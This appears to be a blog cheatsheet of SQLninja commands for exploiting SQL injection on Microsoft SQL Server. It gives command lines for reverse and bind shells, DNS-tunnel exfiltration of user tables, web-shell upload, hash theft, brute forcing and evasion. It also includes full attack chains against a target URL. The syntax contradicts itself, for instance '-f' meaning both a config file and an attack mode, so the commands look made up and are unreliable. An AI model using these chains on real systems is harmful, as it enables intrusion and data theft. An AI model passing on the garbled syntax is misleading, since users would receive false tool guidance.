SQLninja Cheatsheet: Exploiting SQL Injection on MSSQL

SQLninja is a powerful open-source tool used to exploit SQL injection vulnerabilities on Microsoft SQL Server. It helps ethical hackers escalate privileges, gain shell access, and automate exploitation. This cheatsheet provides essential commands, usage syntax, attack modes, and practical tips for red teamers and penetration testers.

SQLninja Cheatsheet

The Ultimate SQL Injection Tool Reference Guide

Basic SQLninja Usage

Start SQLninja
sqlninja
Launch SQLninja in interactive mode.
Load Configuration
sqlninja -f config_file
Load options from configuration file.
Set Target URL
sqlninja -u "http://target.com/vuln.php?id=1"
Specify the vulnerable URL.
Set POST Parameter
sqlninja -p "user=admin&pass=test"
Specify POST parameters for injection.
Verbose Mode
sqlninja -v
Enable verbose output.
Debug Mode
sqlninja -d
Enable debug output (very verbose).
Set HTTP Method
sqlninja -m GET|POST
Specify HTTP method (GET or POST).
Set Injection Parameter
sqlninja -g "parameter"
Specify GET parameter to inject.

Fingerprinting Commands

Basic Fingerprinting
sqlninja -f fingerprint
Perform basic fingerprinting of the DBMS.
Check DB Version
sqlninja -f version
Retrieve database version information.
Check Current User
sqlninja -f user
Retrieve current database user.
Check DB Name
sqlninja -f dbname
Retrieve current database name.
Check Hostname
sqlninja -f hostname
Retrieve server hostname.
Check if SA
sqlninja -f issa
Check if current user is SA (sysadmin).
Check xp_cmdshell
sqlninja -f xpcmdshell
Check if xp_cmdshell is available.
Check Linked Servers
sqlninja -f links
Check for linked SQL servers.

Exploitation Commands

Upload and Execute
sqlninja -f upload_exec -l /local/file -r /remote/file
Upload local file and execute on remote server.
Direct Shell
sqlninja -f directsh -a "command"
Execute command via direct shell.
Reverse Shell
sqlninja -f revsh -l local_ip -p local_port
Spawn a reverse shell to your listener.
DNS Tunnel
sqlninja -f dnstunnel -d domain.com
Create a DNS tunnel for data exfiltration.
Metasploit Integration
sqlninja -f metasploit -l local_ip -p local_port
Generate Metasploit payload and handler.
VNC Injection
sqlninja -f vnc -l local_ip -p local_port
Inject VNC server and connect.
Privilege Escalation
sqlninja -f esca
Attempt privilege escalation.
Steal Hashes
sqlninja -f stealhashes
Extract password hashes from the database.

File Operations

Upload File
sqlninja -f upload -l /local/file -r /remote/file
Upload a local file to the remote server.
Download File
sqlninja -f download -r /remote/file -l /local/file
Download a file from the remote server.
Read File
sqlninja -f readfile -r /remote/file
Read contents of a remote file.
Dir Listing
sqlninja -f dir -r /remote/dir
List contents of a remote directory.
Check Write Permissions
sqlninja -f writable -r /remote/dir
Check if directory is writable.
Find Web Root
sqlninja -f findwebroot
Attempt to locate the web root directory.

Shell Operations

Spawn OS Shell
sqlninja -f os_shell
Spawn an interactive operating system shell.
SQL Shell
sqlninja -f sql_shell
Spawn an interactive SQL shell.
Execute Single Command
sqlninja -f exec -a "command"
Execute a single OS command.
Execute SQL Query
sqlninja -f query -a "SELECT * FROM users"
Execute a SQL query.
Bind Shell
sqlninja -f bind -p port
Create a bind shell on specified port.
ICMP Shell
sqlninja -f icmpsh -l local_ip
Create an ICMP shell (ping tunnel).

Brute Force Attacks

Brute Force SA Password
sqlninja -f bruteforce -w wordlist.txt
Brute force the SA account password.
Dictionary Attack
sqlninja -f dictionary -w wordlist.txt
Dictionary attack against SQL logins.
Brute Force with Rules
sqlninja -f rules -w wordlist.txt -r rules.txt
Brute force with mutation rules.
Brute Force NTLM Hashes
sqlninja -f ntlmbrute -h hashes.txt
Brute force recovered NTLM hashes.

Evasion Techniques

Hex Encoding
sqlninja -x
Use hex encoding for evasion.
Random Case
sqlninja -r
Use random case for evasion.
String Splitting
sqlninja -s
Use string splitting for evasion.
Delay Between Requests
sqlninja -t milliseconds
Add delay between requests.
Use Proxy
sqlninja -P http://proxy:port
Route traffic through a proxy.
Tamper Scripts
sqlninja --tamper tamper_script
Use custom tamper scripts for evasion.

Common Attack Scenarios

Full Attack Chain
sqlninja -u "http://target.com/vuln.php?id=1" -f fingerprint,upload_exec,revsh -l 192.168.1.100 -p 4444
Complete attack from fingerprinting to reverse shell.
Stealthy Data Exfiltration
sqlninja -u "http://target.com/vuln.php?id=1" -f query,dnstunnel -a "SELECT * FROM users" -d exfil.domain.com
Exfiltrate data via DNS tunnel.
Web Shell Deployment
sqlninja -u "http://target.com/vuln.php?id=1" -f upload -l webshell.php -r /var/www/html/ws.php
Upload a web shell to the server.

This cheatsheet is for educational purposes only. Always ensure you have proper authorization before testing any system.

Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

Leave a Reply